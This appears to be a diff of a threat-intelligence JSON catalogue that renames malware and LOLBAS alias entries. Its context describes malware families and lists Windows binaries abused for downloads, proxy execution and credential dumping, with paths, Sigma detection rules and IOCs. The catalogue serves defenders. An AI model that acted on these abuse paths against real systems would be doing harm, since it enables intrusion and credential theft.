Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)][[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)][[Symantec Darkmoon Aug 2005](https://app.tidalcyber.com/references/7088234d-a6fc-49ad-b4fd-2fe8ca333c1d)]", @@ -22662,7 +22662,7 @@ } ], "uuid": "6f48252d-3e86-415b-ab77-8c833d608b47", - "value": "Powerpnt.exe" + "value": "Powerpnt.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary.\n\n**Author:** Reegun J (OCBC Bank)\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\Powerpnt.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\Powerpnt.exe\n\n**Resources:**\n* [https://twitter.com/reegun21/status/1150032506504151040](https://twitter.com/reegun21/status/1150032506504151040)\n* [https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml)\n* IOC: Suspicious Office application Internet/network traffic[[Powerpnt.exe - LOLBAS Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]", @@ -22755,7 +22755,7 @@ } ], "uuid": "6812793e-6342-4da6-b77f-ed29fab1fd9a", - "value": "DNSMessenger" + "value": "DNSMessenger - Associated Software" }, { "description": "[POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. [[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)] [[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)]", @@ -22898,7 +22898,7 @@ } ], "uuid": "4aaf5b58-a6ca-4ec9-84fc-697469698130", - "value": "Powermud" + "value": "Powermud - Associated Software" }, { "description": "[POWERSTATS](https://app.tidalcyber.com/software/39fc59c6-f1aa-4c93-8e43-1f41563e9d9e) is a PowerShell-based first stage backdoor used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6). [[Unit 42 MuddyWater Nov 2017](https://app.tidalcyber.com/references/dcdee265-2e46-4f40-95c7-6a2683edb23a)]", @@ -23063,7 +23063,7 @@ } ], "uuid": "80b9a847-0d74-4c15-b86b-d34e43cfef21", - "value": "Presentationhost.exe" + "value": "Presentationhost.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** File is used for executing Browser applications\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Presentationhost.exe\n* C:\\Windows\\SysWOW64\\Presentationhost.exe\n\n**Resources:**\n* [https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf](https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf)\n* [https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/](https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_presentationhost_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml)\n* Sigma: [proc_creation_win_lolbin_presentationhost.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml)\n* IOC: Execution of .xbap files may not be common on production workstations[[Presentationhost.exe - LOLBAS Project](/references/37539e72-18f5-435a-a949-f9fa5991149a)]", @@ -23159,7 +23159,7 @@ } ], "uuid": "5d8bd4c1-3ab5-4521-8ee8-5da3aad90b7d", - "value": "Print.exe" + "value": "Print.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to send files to the printer\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\print.exe\n* C:\\Windows\\SysWOW64\\print.exe\n\n**Resources:**\n* [https://twitter.com/Oddvarmoe/status/985518877076541440](https://twitter.com/Oddvarmoe/status/985518877076541440)\n* [https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410](https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410)\n\n**Detection:**\n* Sigma: [proc_creation_win_print_remote_file_copy.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml)\n* IOC: Print.exe retrieving files from internet\n* IOC: Print.exe creating executable files on disk[[Print.exe - LOLBAS Project](/references/696ce89a-b3a1-4993-b30d-33a669a57031)]", @@ -23202,7 +23202,7 @@ } ], "uuid": "91a3db3c-53a5-4ee8-9586-af5d8f95ce4c", - "value": "PrintBrm.exe" + "value": "PrintBrm.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Printer Migration Command-Line Tool\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe\n\n**Resources:**\n* [https://twitter.com/elliotkillick/status/1404117015447670800](https://twitter.com/elliotkillick/status/1404117015447670800)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_printbrm.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml)\n* IOC: PrintBrm.exe should not be run on a normal workstation[[PrintBrm.exe - LOLBAS Project](/references/a7ab6f09-c22f-4627-afb1-c13a963efca5)]", @@ -23245,7 +23245,7 @@ } ], "uuid": "f2c150e6-f4dc-4766-8579-16e739a6ca9b", - "value": "Microsoft Sysinternals ProcDump" + "value": "Microsoft Sysinternals ProcDump - Associated Software" }, { "description": "ProcDump is a tool used to monitor applications for CPU spikes and generate crash dumps.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", @@ -23356,7 +23356,7 @@ } ], "uuid": "e8e39cc1-349c-43ca-b45d-9e8f5ead6be4", - "value": "ProtocolHandler.exe" + "value": "ProtocolHandler.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary\n\n**Author:** Nir Chako\n\n**Paths:**\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_protocolhandler_download.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml)\n* IOC: Suspicious Office application Internet/network traffic[[ProtocolHandler.exe - LOLBAS Project](/references/1f678111-dfa3-4c06-9359-816b9ca12cd0)]", @@ -23420,7 +23420,7 @@ } ], "uuid": "7eaa281e-d584-46da-bf0a-abc1fd34f925", - "value": "Provlaunch.exe" + "value": "Provlaunch.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Launcher process\n\n**Author:** Grzegorz Tworek\n\n**Paths:**\n* c:\\windows\\system32\\provlaunch.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1674399582162153472](https://twitter.com/0gtweet/status/1674399582162153472)\n\n**Detection:**\n* Sigma: [proc_creation_win_provlaunch_potential_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml)\n* Sigma: [proc_creation_win_provlaunch_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml)\n* Sigma: [proc_creation_win_registry_provlaunch_provisioning_command.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml)\n* Sigma: [registry_set_provisioning_command_abuse.yml](https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml)\n* IOC: c:\\windows\\system32\\provlaunch.exe executions\n* IOC: Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys[[Provlaunch.exe - LOLBAS Project](/references/56a57369-4707-4dff-ad23-431109f24233)]", @@ -23698,7 +23698,7 @@ } ], "uuid": "85383485-01f9-42a5-9b44-c45c03eae766", - "value": "Psr.exe" + "value": "Psr.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Problem Steps Recorder, used to record screen and clicks.\n\n**Author:** Leon Rodenko\n\n**Paths:**\n* c:\\windows\\system32\\psr.exe\n* c:\\windows\\syswow64\\psr.exe\n\n**Resources:**\n* [https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx](https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx)\n\n**Detection:**\n* Sigma: [proc_creation_win_psr_capture_screenshots.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml)\n* IOC: psr.exe spawned\n* IOC: suspicious activity when running with \"/gui 0\" flag[[Psr.exe - LOLBAS Project](/references/a00782cf-f6b2-4b63-9d8d-97efe17e11c0)]", @@ -23764,7 +23764,7 @@ } ], "uuid": "e3e379e2-1543-4794-9b89-852ba7f6eac7", - "value": "Pterodo" + "value": "Pterodo - Associated Software" }, { "description": "[Pteranodon](https://app.tidalcyber.com/software/7fed4276-807e-4656-95f5-90878b6e2dbb) is a custom backdoor used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067). [[Palo Alto Gamaredon Feb 2017](https://app.tidalcyber.com/references/3f9a6343-1db3-4696-99ed-f22c6eabee71)]", @@ -23812,7 +23812,7 @@ } ], "uuid": "a5f525c2-c9ad-4b97-be30-659bbc34107d", - "value": "Pubprn.vbs" + "value": "Pubprn.vbs - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Proxy execution with Pubprn.vbs\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs\n* C:\\Windows\\SysWOW64\\Printing_Admin_Scripts\\en-US\\pubprn.vbs\n\n**Resources:**\n* [https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/](https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/)\n* [https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology](https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology)\n* [https://github.com/enigma0x3/windows-operating-system-archaeology](https://github.com/enigma0x3/windows-operating-system-archaeology)\n\n**Detection:**\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* Sigma: [proc_creation_win_lolbin_pubprn.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml)[[Pubprn.vbs - LOLBAS Project](/references/d2b6b9fd-5f80-41c0-ac22-06b78c86a9e5)]", @@ -23884,7 +23884,7 @@ } ], "uuid": "8f1073b3-4371-488d-b299-7e6f6e6fcae9", - "value": "ShellTea" + "value": "ShellTea - Associated Software" }, { "description": "[PUNCHBUGGY](https://app.tidalcyber.com/software/d8999d60-3818-4d75-8756-8a55531254d8) is a backdoor malware used by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) that has been observed targeting POS networks in the hospitality industry. [[Morphisec ShellTea June 2019](https://app.tidalcyber.com/references/1b6ce918-651a-480d-8305-82bccbf42e96)][[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)] [[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]", @@ -23930,7 +23930,7 @@ } ], "uuid": "b81c8997-5615-4fc9-a091-a5842cf69819", - "value": "PSVC" + "value": "PSVC - Associated Software" }, { "description": "[PUNCHTRACK](https://app.tidalcyber.com/software/1638d99b-fbcf-40ec-ac48-802ce5be520a) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://app.tidalcyber.com/groups/b3061284-0335-4dcb-9f8e-a3b0412fd46f) to scrape payment card data. [[FireEye Fin8 May 2016](https://app.tidalcyber.com/references/2079101c-d988-430a-9082-d25c475b2af5)] [[FireEye Know Your Enemy FIN8 Aug 2016](https://app.tidalcyber.com/references/0119687c-b46b-4b5f-a6d8-affa14258392)]", @@ -24114,7 +24114,7 @@ } ], "uuid": "da345299-97db-4e76-b81f-265ebd54cbcb", - "value": "Mespinoza" + "value": "Mespinoza - Associated Software" }, { "description": "[Pysa](https://app.tidalcyber.com/software/e0d5ecce-eca0-4f01-afcc-0c8e92323016) is a ransomware that was first used in October 2018 and has been seen to target particularly high-value finance, government and healthcare organizations.[[CERT-FR PYSA April 2020](https://app.tidalcyber.com/references/4e502db6-2e09-4422-9dcc-1e10e701e122)]", @@ -24157,7 +24157,7 @@ } ], "uuid": "96dcc3d3-057c-4e81-b833-a9f09c1f3194", - "value": "Pinkslipbot" + "value": "Pinkslipbot - Associated Software" }, { "description": "[[Trend Micro Qakbot December 2020](https://app.tidalcyber.com/references/c061ce45-1452-4c11-9586-bd5eb2d718ab)][[Red Canary Qbot](https://app.tidalcyber.com/references/6e4960e7-ae5e-4b68-ac85-4bd84e940634)][[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)][[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]", @@ -24171,7 +24171,7 @@ } ], "uuid": "11b32ebe-8ee3-46bc-aaf0-b0761dfa9c0c", - "value": "QBot" + "value": "QBot - Associated Software" }, { "description": "[[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)]", @@ -24185,7 +24185,7 @@ } ], "uuid": "e26ce4bb-2117-4f21-be70-5cb4c448c303", - "value": "QuackBot" + "value": "QuackBot - Associated Software" }, { "description": "[QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://app.tidalcyber.com/software/9050b418-5ffd-481a-a30d-f9059b0871ea) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://app.tidalcyber.com/software/c8af096e-c71e-4751-b203-70c285b7a7bd) and [Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66).[[Trend Micro Qakbot December 2020](https://app.tidalcyber.com/references/c061ce45-1452-4c11-9586-bd5eb2d718ab)][[Red Canary Qbot](https://app.tidalcyber.com/references/6e4960e7-ae5e-4b68-ac85-4bd84e940634)][[Kaspersky QakBot September 2021](https://app.tidalcyber.com/references/f40cabe3-a324-4b4d-8e95-25c036dbd8b5)][[ATT QakBot April 2021](https://app.tidalcyber.com/references/c7b0b3f3-e9ea-4159-acd1-f6d92ed41828)]", @@ -24272,7 +24272,7 @@ } ], "uuid": "cc118a28-e714-416e-bf2d-e82525f4782d", - "value": "xRAT" + "value": "xRAT - Associated Software" }, { "description": "[QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://app.tidalcyber.com/software/4bab7c2b-5ec4-467e-8df4-f2e6996e136b) is developed in the C# language.[[GitHub QuasarRAT](https://app.tidalcyber.com/references/c87e4427-af97-4e93-9596-ad5a588aa171)][[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]", @@ -24334,7 +24334,7 @@ } ], "uuid": "9f3ab541-3447-4e2e-9f35-f7f1f7328385", - "value": "Tunnus" + "value": "Tunnus - Associated Software" }, { "description": "[QUIETCANARY](https://app.tidalcyber.com/software/52d3515c-5184-5257-bf24-56adccb4cccd) is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]", @@ -24431,7 +24431,7 @@ } ], "uuid": "b75127d4-1d6e-49fe-9919-fe5e471be7c2", - "value": "Quser.exe" + "value": "Quser.exe - Associated Software" }, { "description": "According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is \"a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server\".[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", @@ -24645,7 +24645,7 @@ } ], "uuid": "4a94b274-9bc0-4c51-82d7-e82f6e107b9c", - "value": "Rasautou.exe" + "value": "Rasautou.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Remote Access Dialer\n\n**Author:** Tony Lambert\n\n**Paths:**\n* C:\\Windows\\System32\\rasautou.exe\n\n**Resources:**\n* [https://github.com/fireeye/DueDLLigence](https://github.com/fireeye/DueDLLigence)\n* [https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html](https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html)\n\n**Detection:**\n* Sigma: [win_rasautou_dll_execution.yml](https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml)\n* IOC: rasautou.exe command line containing -d and -p[[Rasautou.exe - LOLBAS Project](/references/dc299f7a-403b-4a22-9386-0be3e160d185)]", @@ -24757,7 +24757,7 @@ } ], "uuid": "d6d49a18-4cf9-4ba3-906c-0091494c42e4", - "value": "FIENDCRY" + "value": "FIENDCRY - Associated Software" }, { "description": "The DUEBREW component is a Perl2Exe binary launcher. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", @@ -24771,7 +24771,7 @@ } ], "uuid": "2f190c9a-f999-4e44-8083-619225ef7890", - "value": "DUEBREW" + "value": "DUEBREW - Associated Software" }, { "description": "The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", @@ -24785,7 +24785,7 @@ } ], "uuid": "61841581-51bc-4559-b87f-e3fbadf40eb7", - "value": "DRIFTWOOD" + "value": "DRIFTWOOD - Associated Software" }, { "description": "[RawPOS](https://app.tidalcyber.com/software/6ea1bf95-fed8-4b94-8071-aa19a3af5e34) is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. [[Kroll RawPOS Jan 2017](https://app.tidalcyber.com/references/cbbfffb9-c378-4e57-a2af-e76e6014ed57)] [[TrendMicro RawPOS April 2015](https://app.tidalcyber.com/references/e483ed86-713b-42c6-ad77-e9b889bbcb81)] [[Visa RawPOS March 2015](https://app.tidalcyber.com/references/a2371f44-0a88-4d68-bbe7-7e79f13f78c2)] FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. [[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)] [[DarkReading FireEye FIN5 Oct 2015](https://app.tidalcyber.com/references/afe0549d-dc1b-4bcf-9a1d-55698afd530e)]", @@ -24921,7 +24921,7 @@ } ], "uuid": "c0f4b154-5dac-40e7-b6d0-eb111c1da58c", - "value": "rcsi.exe" + "value": "rcsi.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Non-Interactive command line inerface included with Visual Studio.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* no default\n\n**Resources:**\n* [https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/](https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/)\n\n**Detection:**\n* Sigma: [proc_creation_win_csi_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [proc_creation_win_csi_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml)[[rcsi.exe - LOLBAS Project](/references/dc02058a-7ed3-4253-a976-6f99b9e91406)]", @@ -25046,7 +25046,7 @@ } ], "uuid": "d6302e6b-9ff5-4278-9d9d-98cbbffb5cc2", - "value": "rdrleakdiag.exe" + "value": "rdrleakdiag.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Windows resource leak diagnostic tool\n\n**Author:** John Dwyer\n\n**Paths:**\n* c:\\windows\\system32\\rdrleakdiag.exe\n* c:\\Windows\\SysWOW64\\rdrleakdiag.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1299071304805560321?s=21](https://twitter.com/0gtweet/status/1299071304805560321?s=21)\n* [https://www.pureid.io/dumping-abusing-windows-credentials-part-1/](https://www.pureid.io/dumping-abusing-windows-credentials-part-1/)\n* [https://github.com/LOLBAS-Project/LOLBAS/issues/84](https://github.com/LOLBAS-Project/LOLBAS/issues/84)\n\n**Detection:**\n* Sigma: [proc_creation_win_rdrleakdiag_process_dumping.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml)\n* Elastic: [https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html](https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)[[rdrleakdiag.exe - LOLBAS Project](/references/1feff728-2230-4a45-bd64-6093f8b42646)]", @@ -25108,7 +25108,7 @@ } ], "uuid": "07310f3e-ca07-43f8-a5fd-f078bd0b1ae4", - "value": "BUGJUICE" + "value": "BUGJUICE - Associated Software" }, { "description": "[RedLeaves](https://app.tidalcyber.com/software/5264c3ab-14e1-4ae1-854e-889ebde029b4) is a malware family used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). The code overlaps with [PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) and may be based upon the open source tool Trochilus. [[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)] [[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]", @@ -25151,7 +25151,7 @@ } ], "uuid": "7d5f2e75-7ff0-44e4-b8a7-2d817c58ffe0", - "value": "reg.exe" + "value": "reg.exe - Associated Software" }, { "description": "[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. [[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]\n\nUtilities such as 